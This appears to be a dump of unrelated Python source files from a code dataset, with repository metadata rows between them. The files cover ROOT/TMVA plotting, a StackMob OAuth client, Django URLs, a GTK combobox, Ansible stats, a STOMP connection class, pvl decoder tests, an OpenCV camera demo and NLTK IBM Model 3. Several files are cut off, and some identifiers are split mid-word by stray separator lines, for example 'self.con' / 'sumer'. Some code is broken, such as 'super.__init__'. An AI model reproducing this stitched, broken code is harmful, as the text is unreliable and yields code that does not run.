inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
frame = w.var('mwwbb').frame()
for x in np.linspace(400,1600,20):
w.var('mx').setVal(x)
nn.plotOn(frame)
c1 = ROOT.TCanvas("c2",'',400,400)
frame.Draw()
c1.SaveAs('tmva.pdf')
frame = w.var('mx').frame()
w.var('mwwbb').setVal(800)
for x in np.linspace(400,1600,20):
w.var('mwwbb').setVal(x)
nn.plotOn(frame)
frame.Draw()
c1.SaveAs('tmva_vs_mx.pdf')
def plotAdaptive():
'''
make plots of the output of the parametrized model
'''
#import class code should work automatically, but confused by namespace
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
c1 = ROOT.TCanvas("c2",'',400,400)
frame = w.var('score').frame()
c1.SetLogy();
for val in np.linspace(400,1500,100):
w.var('mx').setVal(val)
w.pdf('m1morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('m0morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kBlue))
frame.Draw()
c1.SaveAs('root_bspline.pdf')
def fitAdaptive():
#ugh, tough b/c fixed data are the features, not the NN output
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
ROOT.gROOT.ProcessLine('.L CompositeFunctionPdf.cxx+')
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
w.Print()
w.factory('CompositeFunctionPdf::sigtemplate(fm0morphfunc)')
w.factory('CompositeFunctionPdf::bkgtemplate(fm1morphfunc)')
w.factory('Uniform::baseline(score)')
w.factory('SUM::template(sigfrac[0,1]*sigtemplate,const[0.01]*baseline,bkgtemplate)')
mu = w.var('mx')
mu.setVal(0)
c1 = ROOT.TCanvas('c1')
sframe = w.var('score').frame()
|
stackmob/stackmob-python-examples
|
stackmob/client.py
|
Python
|
apache-2.0
| 1,397 | 0.030064 |
import oauth.oauth as oauth
import httplib
import json
import sys
class BaseClient:
def __init__(self, baseURL, key, secret):
self.url = baseURL
self.connection = httplib.HTTPConnection(baseURL)
self.consumer = oauth.OAuthConsumer(key, secret)
def _execute(self, httpmethod, path, body):
request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_method=httpmethod, http_url="http://" + self.url + "/" + path)
request.sign_request(oauth.OAuthSignatureMethod_HMAC_SHA1(), self.con
|
sumer, None)
headers = request.to_header()
headers["Content-Type"] = "application/json"
headers["Accept"] = "application/vnd.stackmob+json; version=0"
self.connection.set_debuglevel(1)
bodyString = ""
if(body != None):
b
|
odyString = json.dumps(body)
self.connection.request(request.http_method, "/"+path, body=bodyString, headers=headers)
return self.connection.getresponse()
def get(self, path):
self._execute("GET", path, None)
def post(self, path, body):
self._execute("POST", path, body)
def put(self, path, body):
self._execute("PUT", path, body)
def delete(self, path):
self._execute("DELETE", path, None)
class APIClient(BaseClient):
def __init__(self, key, secret):
super.__init__("api.mob1.stackmob.com", key, secret)
class PushAPIClient(BaseClient):
def __init__(self, key, secret):
super.__init__("push.mob1.stackmob.com", key, secret)
|
dwillis/socialcongress
|
tracker/urls.py
|
Python
|
unlicense
| 1,173 | 0.00682 |
from django.conf.urls.defaults import patterns, inclu
|
de, url
from django.utils.functional import curry
from django.views.defaults import server_error, page_not_found
from tracker.api import MemberResource, ReportResource
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(MemberResource())
v1_api.register(ReportResource())
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
handler500 = curry(server_error, templa
|
te_name='admin/500.html')
handler404 = curry(page_not_found, template_name='admin/404.html')
urlpatterns = patterns('tracker.views',
# Examples:
# url(r'^$', 'socialcongress.views.home', name='home'),
url(r'^admin/_update$', 'update', name="update"),
url(r'^admin/chamber/(?P<chamber>[-a-z]+)/$', 'chamber_csv', name='admin_chamber_csv'),
url(r'^admin/weekly/chamber/(?P<chamber>[-a-z]+)/$', 'weekly_csv', name='admin_weekly_csv'),
#url(r'^reports/weeks/$', 'week_index', name='week_index'),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# API urls
url(r'^api/', include(v1_api.urls)),
)
|
R3v1L/evogtk
|
evogtk/gui/widgetlib/dbcombobox.py
|
Python
|
mit
| 4,770 | 0.012159 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <central@evosistemas.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# dbcombobox
# Database gtk.ComboBox widget module
###############################################################################
# GTK Imports
import gobject, gtk
# DBWidget base class
from dbwidgetbase import DBWidgetBase
class DBComboBox(gtk.ComboBox,DBWidgetBase):
"""
Database gtk.ComboBox widget
"""
__gtype_name__ = 'DBComboBox'
# Widget properties
__properties = {
'choices' : (gobject.TYPE_STRING,'Choices','Separated values of choice for the widget (separator character is used as separator)','',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
'separator-char' : (gobject.TYPE_STRING,'Separator','Separator character used to separate choice values',',',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
}
__properties.update(DBWidgetBase._DBWidgetBase__properties)
__gproperties__ = __properties
def __init__(self,*args,**kwargs):
"""
Class initialization
"""
# Initialize DBWidget base class
DBWidgetBase.__init__(self,*args,**kwargs)
# Initialize parent widget
gtk.ComboBox.__init__(self)
# List store for data
self.__liststore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.set_model(self.__liststore)
# Cell renderers for combobox
crt = gtk.CellRendererText()
self.pack_start(crt, True)
self.add_attribute(crt, 'text', 0)
crp = gtk.CellRendererPixbuf()
crp.set_property('xalign',1)
self.pack_start
|
(crp, True)
self.add_attribute(crp, 'pixbuf', 1)
# Blank and error pixbufs
self.__blankpixbuf=gtk.gdk.Pixbuf(gtk.gdk.COLO
|
RSPACE_RGB,True,8,1,1)
self.__errorpixbuf=self.render_icon(gtk.STOCK_DIALOG_ERROR, gtk.ICON_SIZE_MENU)
# Widget properties
if self.inmediate_validation:
self.connect('changed',self.validate)
def get_widget_data(self):
"""
Returns widget data
"""
iter=self.get_active_iter()
if iter:
return self.__liststore.get_value(iter,0)
else:
return None
def set_invalidated(self):
"""
Set this widget as invalidated
"""
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
iter=self.get_active_iter()
if iter:
self.__liststore.set_value(iter,1,self.__errorpixbuf)
def set_validated(self):
"""
Set this widget as validated
"""
self.__validationerrors=[]
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
def do_get_property(self, property):
"""
Property getting value handling
"""
if property.name=='choices':
return self.choices
elif property.name=='separator-char':
return self.separator_char
else:
return DBWidgetBase.do_get_property(self, property)
def do_set_property(self, property, value):
"""
Property setting value handling
"""
if property.name=='choices':
self.choices=value
# Set values
self.__liststore.clear()
if value:
for choice in value.split(self.separator_char):
self.__liststore.append([choice,self.__blankpixbuf])
self.set_active(0)
elif property.name=='separator-char':
self.separator_char=value
else:
DBWidgetBase.do_set_property(self, property, value)
gobject.type_register(DBComboBox)
|
alvaroaleman/ansible
|
lib/ansible/executor/stats.py
|
Python
|
gpl-3.0
| 2,779 | 0.009356 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
''' return information about a
|
particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
def set_custom_stats(self, which, what, host=N
|
one):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
|
StratusLab/client
|
api/code/src/main/python/stomp/connect.py
|
Python
|
apache-2.0
| 37,671 | 0.007884 |
import math
import random
import re
import socket
import sys
import threading
import time
import types
import xml.dom.minidom
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
import ssl
from ssl import SSLError
DEFAULT_SSL_VERSION = ssl.PROTOCOL_SSLv3
except ImportError: # python version < 2.6 without the backported ssl module
ssl = None
class SSLError:
pass
DEFAULT_SSL_VERSION = None
try:
from socket import SOL_SOCKET, SO_KEEPALIVE
from socket import SOL_TCP, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT
LINUX_KEEPALIVE_AVAIL=True
except ImportError:
LINUX_KEEPALIVE_AVAIL=False
import exception
import listener
import utils
from backward import decode, encode, hasbyte, pack, socksend, NULL
try:
import uuid
except ImportError:
from backward import uuid
try:
from fractions import gcd
except ImportError:
from backward import gcd
import logging
log = logging.getLogger('stomp.py')
class Connection(object):
"""
Represents a STOMP client connection.
"""
# ========= PRIVATE MEMBERS =========
# List of all host names (unqualified, fully-qualified, and IP
# addresses) that refer to the local host (both loopback interface
# and external interfaces). This is used for determining
# preferred targets.
__localhost_names = [ "localhost", "127.0.0.1" ]
try:
__localhost_names.append(socket.gethostbyname(socket.gethostname()))
except:
pass
try:
__localhost_names.append(socket.gethostname())
except:
pass
try:
__localhost_names.append(socket.getfqdn(socket.gethostname()))
except:
pass
#
# Used to parse the STOMP "content-length" header lines,
#
__content_length_re = re.compile('^content-length[:]\\s*(?P<value>[0-9]+)', re.MULTILINE)
def __init__(self,
host_and_ports = [ ('localhost', 61613) ],
user = None,
passcode = None,
prefer_localhost = True,
try_loopback_connect = True,
reconnect_sleep_initial = 0.1,
reconnect_sleep_increase = 0.5,
reconnect_sleep_jitter = 0.1,
reconnect_sleep_max = 60.0,
reconnect_attempts_max = 3,
use_ssl = False,
ssl_key_file = None,
ssl_cert_file = None,
ssl_ca_certs = None,
ssl_cert_validator = None,
wait_on_receipt = False,
ssl_version = DEFAULT_SSL_VERSION,
timeout = None,
version = 1.0,
strict = True,
heartbeats = (0, 0),
keepalive = None
):
"""
Initialize and start this connection.
\param host_and_ports
a list of (host, port) tuples.
\param prefer_localhost
if True and the local host is mentioned in the (host,
port) tuples, try to connect to this first
\param try_loopback_connect
if True and the local host is found in the host
tuples, try connecting to it using loopback interface
(127.0.0.1)
\param reconnect_sleep_initial
initial delay in seconds to wait before reattempting
to establish a connection if connection to any of the
hosts fails.
\param reconnect_sleep_increase
factor by which the sleep delay is increased after
each connection attempt. For example, 0.5 means
to wait 50% longer than before the previous attempt,
1.0 means wait twice as long, and 0.0 means keep
the delay constant.
\param reconnect_sleep_max
maximum delay between connection attempts, regardless
of the reconnect_sleep_increase.
\param reconnect_sleep_jitter
random additional time to wait (as a percentage of
the time determined using the previous parameters)
between connection attempts in order to avoid
stampeding. For example, a value of 0.1 means to wait
an extra 0%-10% (randomly determined) of the delay
calculated using the previous three parameters.
\param reconnect_attempts_max
maximum attempts to reconnect
\param use_ssl
connect using SSL to the socket. This wraps the
socket in a SSL connection. The constructor will
raise an exception if you ask for SSL, but it can't
find the SSL module.
\param ssl
|
_cert_file
the path to a X509 certificate
\param ssl_key_file
the path to a X509 key file
\param ssl_ca_certs
|
the path to the a file containing CA certificates
to validate the server against. If this is not set,
server side certificate validation is not done.
\param ssl_cert_validator
function which performs extra validation on the client
certificate, for example checking the returned
certificate has a commonName attribute equal to the
hostname (to avoid man in the middle attacks).
The signature is:
(OK, err_msg) = validation_function(cert, hostname)
where OK is a boolean, and cert is a certificate structure
as returned by ssl.SSLSocket.getpeercert()
\param wait_on_receipt
if a receipt is specified, then the send method should wait
(block) for the server to respond with that receipt-id
before continuing
\param ssl_version
SSL protocol to use for the connection. This should be
one of the PROTOCOL_x constants provided by the ssl module.
The default is ssl.PROTOCOL_SSLv3
\param timeout
the timeout value to use when connecting the stomp socket
\param version
STOMP protocol version (1.0 or 1.1)
\param strict
if true, use the strict version of the protocol. For STOMP 1.1, this means
it will use the STOMP connect header, rather than CONNECT.
\param heartbeats
a tuple containing the heartbeat send and receive time in millis. (0,0)
if no heartbeats
\param keepalive
some operating systems support sending the occasional heart
beat packets to detect when a connection fails. This
parameter can either be set set to a boolean to turn on the
default keepalive options for your OS, or as a tuple of
values, which also enables keepalive packets, but specifies
options specific to your OS implementation
"""
sorted_host_and_ports = []
sorted_host_and_ports.extend(host_and_ports)
#
# If localhost is preferred, make sure all (host, port) tuples that refer to the local host come first in the list
#
if prefer_localhost:
sorted_host_and_ports.sort(key = self.is_localhost)
#
# If the user wishes to attempt connecting to local ports using the loopback interface, for each (host, port) tuple
# referring to a local host, add an entry with the host name replaced by 127.0.0.1 if it doesn't exist already
#
loopback_host_and_ports = []
if try_loopback_connect:
for host_and_port in sorted_host_and_ports:
if self.is_localhost(host_and_port) == 1:
port = host_and_port[1]
if (not ("127.0.0.1", port) in sorted_host_and_ports
and not ("localhost", port) in sorted_host_and_ports):
loopback_host_and_ports.append(("127.0.0.1", port))
#
# Assemble the final, possibly sorted list
|
dursk/pyfolio
|
pyfolio/__init__.py
|
Python
|
apache-2.0
| 416 | 0 |
import warnings
from . import utils
from . import timeseries
from . import pos
from . import txn
from .tears import * # noqa
from .plot
|
ting import * # noqa
try:
from . import bayesian
except ImportError:
warnings.warn(
"Could not import bayesian submodule due to missing pymc3 dependency.",
ImportWarning)
__version__ = '0.1'
__all__ = ['utils', 'timeseries', 'pos', 'txn', 'bayesia
|
n']
|
planetarypy/pvl
|
tests/test_decoder.py
|
Python
|
bsd-3-clause
| 10,166 | 0 |
#!/usr/bin/env python
"""This module has tests for the pvl decoder functions."""
# Copyright 2019-2021, Ross A. Beyer (rbeyer@seti.org)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the Lice
|
nse.
import datetime
import itertools
import unittest
from decimal import Decimal
from pvl.decoder import PVLDecoder, ODLDecoder, PDSLabelDecoder, for_try_except
from pvl.collections import Quantity
class TestForTryExcept(unittest.TestCase):
def test_for_try_except(self):
self.assertEqual(
5, for_try_except(ValueError, int, ("frank", "7.7", "5"))
)
self.assertRaises(
ValueError, for_try_except, ValueError, int, ("frank"
|
, "7.7", "a")
)
self.assertEqual(
datetime.date(2001, 1, 1),
for_try_except(
ValueError,
datetime.datetime.strptime,
itertools.repeat("2001-001"),
("%Y-%m-%d", "%Y-%j"),
).date(),
)
class TestDecoder(unittest.TestCase):
def setUp(self):
self.d = PVLDecoder()
def test_decode_quoted_string(self):
self.assertEqual("Quoted", self.d.decode_quoted_string('"Quoted"'))
self.assertEqual(
'He said, "hello"',
self.d.decode_quoted_string("""'He said, "hello"'"""),
)
self.assertEqual(
'She said, \\"bye\\"',
self.d.decode_quoted_string(r"'She said, \"bye\"'"),
)
self.assertEqual(
"No\\tin Python", self.d.decode_quoted_string(r"'No\tin Python'")
)
self.assertEqual(
"Line -\n Continued",
self.d.decode_quoted_string("'Line -\n Continued'"),
)
# print(self.d.decode_quoted_string("""'mixed"\\'quotes'"""))
def test_decode_unquoted_string(self):
self.assertEqual("Unquoted", self.d.decode_unquoted_string("Unquoted"))
for s in (
'hhhhh"hello"',
"Reserved=",
"No\tin Python",
"Line -\n Continued",
):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_unquoted_string, s)
def test_decode_decimal(self):
for p in (
("125", 125),
("+211109", 211109),
("-79", -79),
("69.35", 69.35),
("+12456.345", 12456.345), # Integers
("-0.23456", -0.23456),
(".05", 0.05),
("-7.", -7), # Floating
("-2.345678E12", -2345678000000.0),
("1.567E-10", 1.567e-10),
("+4.99E+3", 4990.0),
): # Exponential
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_decimal(p[0]))
for s in ("2#0101#", "frank"):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_decimal, s)
def test_decode_withDecimal(self):
d = PVLDecoder(real_cls=Decimal)
s = "123.450"
self.assertEqual(d.decode_decimal(s), Decimal(s))
self.assertRaises(ValueError, d.decode_decimal, "fruit")
def test_decode_non_decimal(self):
for p in (
("2#0101#", 5),
("+2#0101#", 5),
("-2#0101#", -5), # Binary
("8#0107#", 71),
("+8#0156#", 110),
("-8#0134#", -92), # Oct
("16#100A#", 4106),
("+16#23Bc#", 9148),
("-16#98ef#", -39151),
): # Hex
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_non_decimal(p[0]))
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2001-027", datetime.date(2001, 1, 27)),
("2001-027Z", datetime.date(2001, 1, 27)),
("23:45", datetime.time(23, 45, tzinfo=utc)),
("01:42:57", datetime.time(1, 42, 57, tzinfo=utc)),
("12:34:56.789", datetime.time(12, 34, 56, 789000, tzinfo=utc)),
(
"2001-027T23:45",
datetime.datetime(2001, 1, 27, 23, 45, tzinfo=utc),
),
(
"2001-01-01T01:34Z",
datetime.datetime(2001, 1, 1, 1, 34, tzinfo=utc),
),
("01:42:57Z", datetime.time(1, 42, 57, tzinfo=utc)),
("2001-12-31T01:59:60.123Z", "2001-12-31T01:59:60.123Z"),
("2001-12-31T01:59:60.123456789", "2001-12-31T01:59:60.123456789"),
("01:00:60", "01:00:60"),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "frank")
fancy = "2001-001T01:10:39+7"
self.assertRaises(ValueError, self.d.decode_datetime, fancy)
def test_decode_simple_value(self):
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2#0101#", 5),
("-79", -79),
("Unquoted", "Unquoted"),
('"Quoted"', "Quoted"),
("Null", None),
("TRUE", True),
("false", False),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_simple_value(p[0]))
def test_decode_quantity(self):
q = self.d.decode_quantity("15", "m/s")
self.assertEqual(q, Quantity("15", "m/s"))
try:
from astropy import units as u
d = PVLDecoder(quantity_cls=u.Quantity)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, u.Quantity("15", "m/s"))
except ImportError: # astropy isn't available.
pass
try:
from pint import Quantity as pintquant
d = PVLDecoder(quantity_cls=pintquant)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, pintquant("15", "m/s"))
except ImportError: # pint isn't available.
pass
class TestODLDecoder(unittest.TestCase):
def setUp(self):
self.d = ODLDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12)),
("12:00:45", datetime.time(12, 0, 45)),
(
"12:00:45.4571",
datetime.time(12, 0, 45, 457100),
),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
("1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "01:00:60")
try:
from dateutil import tz
tz_plus_7 = tz.tzoffset("+7", datetime.timedelta(hours=7))
for p in (
("01:12:22+07", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
("01:12:22+7", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
(
"01:10:39.4575+07",
datetime.time(1, 10, 39, 457500, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39+
|
ginabythebay/iddocs
|
bcs/views.py
|
Python
|
apache-2.0
| 827 | 0 |
from django.core.urlresolvers import reverse
from bakery.views import BuildableDetailView, BuildableListView
from core.views import get_build_path
from .models import BirthCer
|
tificate
class ListView(BuildableListView):
def __init__(self, **kwargs):
super(ListView, self).__init__(**kwargs)
ListView.build_path = get_build_path('bcs:list', 'index.html')
template_name = 'bcs/list.html'
context_object_name = 'list'
def get_queryset(self):
""" Return the documents ordered by location name"""
return BirthCertificate.objects.order_by('location')
class DetailView(Builda
|
bleDetailView):
model = BirthCertificate
template_name = 'bcs/detail.html'
context_object_name = 'bc'
def get_url(self, obj):
return reverse('bcs:detail', kwargs={'pk': obj.pk})
|
raygeeknyc/skinner
|
frameprocessordemo.py
|
Python
|
gpl-3.0
| 3,056 | 0.017997 |
import numpy
import cv2
import time
print "Starting demo"
frameTimerDuration = 1
# This is the desired resolution of the Pi camera
resolution = (320, 240)
# This is the desired maximum framerate, 0 for maximum possible throughput
framerate = 0
# These are the resolution of the output display, set these
displayWidth = 32.0
displayHeight = 16.0
# These are the horizontal margins of the input feed to crop, everything else scales to fit these
xLeft = 150
xRight = 150
# Open cam, decode image, show in window
cap = cv2.VideoCapture(0) # use 1 or 2 or ... for other camera
success, img = cap.read()
resolution = (len(img[0]), len(img))
print "input resolution is %d,%d" % resolution
print "target resolution is %d,%d" % (displayWidth, displayHeight)
cv2.namedWindow("Original")
cv2.namedWindow("Cropped")
cv2.namedWindow("Downsampled")
cv2.namedWindow("Equalized")
cv2.namedWindow("Contrast")
_displayAspectRatio = displayHeight / displayWidth
print "aspect ratio %f" % _displayAspectRatio
_xMin = xLeft
_xMax = resolution[0]-xRight
_width = _xMax+1 - _xMin
_height = int(_displayAspectRatio * _width)
_yMin = int((resolution[1] - _height)/2)
_yMax = _yMin + _height
print "min = %d, max = %d, height = %d" % (_yMin, _yMax, _height)
downsampleXFactor = displayWidth / _width
downsampleYFactor = displayHeight / _height
print "Crop to (%d,%d)=%d:(%d,%d)=%d" % (_xMin,_xMax,(_xMax-_xMin),_yMin,_yMax,(_yMax-_yMin))
print "Scaling by (x,y) %f, %f" % (downsampleXFactor, downsampleYFactor)
print "Scales to (%d,%d)" % (_wi
|
dth*downsampleXFactor,_height*downsampleYFactor)
def get_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
averageBrightness = int(cv2.mean(hsv[:,:,2])[0])
|
return bytearray(format(averageBrightness,'05d'))
def equalize_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv[:,:,2] = cv2.equalizeHist(hsv[:,:,2])
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def equalize_hist(img):
for c in xrange(0, 2):
img[:,:,c] = cv2.equalizeHist(img[:,:,c])
return img
frameTimer = time.time() + frameTimerDuration
frameCounter = 0
try:
key = -1
while(key < 0):
success, img = cap.read()
frameCounter += 1
if time.time() > frameTimer:
print "processed %d frames in %f seconds" % (frameCounter, frameTimerDuration)
frameCounter = 0
frameTimer = time.time() + frameTimerDuration
brightness = get_brightness(img)
print "Brightness " + brightness
cropImg = img[_yMin:_yMax,_xMin:_xMax]
smallImg = cv2.resize(cropImg, (0,0), fx=downsampleXFactor, fy=downsampleYFactor)
equalizedImg = numpy.copy(cropImg)
contrastImg = numpy.copy(cropImg)
equalize_hist(equalizedImg)
contrastImg = equalize_brightness(contrastImg)
cv2.imshow("Original", img)
cv2.imshow("Cropped", cropImg)
cv2.imshow("Downsampled", smallImg)
cv2.imshow("Equalized", equalizedImg)
cv2.imshow("Contrast", contrastImg)
key = cv2.waitKey(1)
except KeyboardInterrupt as e:
print "Interrupted"
stream.close()
cap.close()
camera.close()
cv2.destroyAllWindows()
|
nelango/ViralityAnalysis
|
model/lib/nltk/translate/ibm3.py
|
Python
|
mit
| 13,875 | 0.000865 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: IBM Model 3
#
# Copyright (C) 2001-2013 NLTK Project
# Authors: Chin Yee Lee, Hengfeng Li, Ruxin Hou, Calvin Tanujaya Lim
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Translation model that considers how a word can be aligned to
multiple words in another language.
IBM Model 3 improves on Model 2 by directly modeling the phenomenon
where a word in one language may be translated into zero or more words
in another. This is expressed by the fertility probability,
n(phi | source word).
If a source word translates into more than one word, it is possible to
generate sentences that have the same alignment in multiple ways. This
is modeled by a distortion step. The distortion probability, d(j|i,l,m),
predicts a target word position, given its aligned source word's
position. The distortion probability replaces the alignment probability
of Model 2.
The fertility probability is not applicable for NULL. Target words that
align to NULL are assumed to be distributed uniformly in the target
sen
|
tence. The existence of these words is modeled by p1, the probability
that a target word produced by a
|
real source word requires another
target word that is produced by NULL.
The EM algorithm used in Model 3 is:
E step - In the training data, collect counts, weighted by prior
probabilities.
(a) count how many times a source language word is translated
into a target language word
(b) count how many times a particular position in the target
sentence is aligned to a particular position in the source
sentence
(c) count how many times a source word is aligned to phi number
of target words
(d) count how many times NULL is aligned to a target word
M step - Estimate new probabilities based on the counts from the E step
Because there are too many possible alignments, only the most probable
ones are considered. First, the best alignment is determined using prior
probabilities. Then, a hill climbing approach is used to find other good
candidates.
Notations:
i: Position in the source sentence
Valid values are 0 (for NULL), 1, 2, ..., length of source sentence
j: Position in the target sentence
Valid values are 1, 2, ..., length of target sentence
l: Number of words in the source sentence, excluding NULL
m: Number of words in the target sentence
s: A word in the source language
t: A word in the target language
phi: Fertility, the number of target words produced by a source word
p1: Probability that a target word produced by a source word is
accompanied by another target word that is aligned to NULL
p0: 1 - p1
References:
Philipp Koehn. 2010. Statistical Machine Translation.
Cambridge University Press, New York.
Peter E Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and
Robert L. Mercer. 1993. The Mathematics of Statistical Machine
Translation: Parameter Estimation. Computational Linguistics, 19 (2),
263-311.
"""
from __future__ import division
from collections import defaultdict
from math import factorial
from nltk.translate import AlignedSent
from nltk.translate import Alignment
from nltk.translate import IBMModel
from nltk.translate import IBMModel2
from nltk.translate.ibm_model import Counts
import warnings
class IBMModel3(IBMModel):
"""
Translation model that considers how a word can be aligned to
multiple words in another language
>>> bitext = []
>>> bitext.append(AlignedSent(['klein', 'ist', 'das', 'haus'], ['the', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus', 'war', 'ja', 'groß'], ['the', 'house', 'was', 'big']))
>>> bitext.append(AlignedSent(['das', 'buch', 'ist', 'ja', 'klein'], ['the', 'book', 'is', 'small']))
>>> bitext.append(AlignedSent(['ein', 'haus', 'ist', 'klein'], ['a', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus'], ['the', 'house']))
>>> bitext.append(AlignedSent(['das', 'buch'], ['the', 'book']))
>>> bitext.append(AlignedSent(['ein', 'buch'], ['a', 'book']))
>>> bitext.append(AlignedSent(['ich', 'fasse', 'das', 'buch', 'zusammen'], ['i', 'summarize', 'the', 'book']))
>>> bitext.append(AlignedSent(['fasse', 'zusammen'], ['summarize']))
>>> ibm3 = IBMModel3(bitext, 5)
>>> print(round(ibm3.translation_table['buch']['book'], 3))
1.0
>>> print(round(ibm3.translation_table['das']['book'], 3))
0.0
>>> print(round(ibm3.translation_table['ja'][None], 3))
1.0
>>> print(round(ibm3.distortion_table[1][1][2][2], 3))
1.0
>>> print(round(ibm3.distortion_table[1][2][2][2], 3))
0.0
>>> print(round(ibm3.distortion_table[2][2][4][5], 3))
0.75
>>> print(round(ibm3.fertility_table[2]['summarize'], 3))
1.0
>>> print(round(ibm3.fertility_table[1]['book'], 3))
1.0
>>> print(ibm3.p1)
0.054...
>>> test_sentence = bitext[2]
>>> test_sentence.words
['das', 'buch', 'ist', 'ja', 'klein']
>>> test_sentence.mots
['the', 'book', 'is', 'small']
>>> test_sentence.alignment
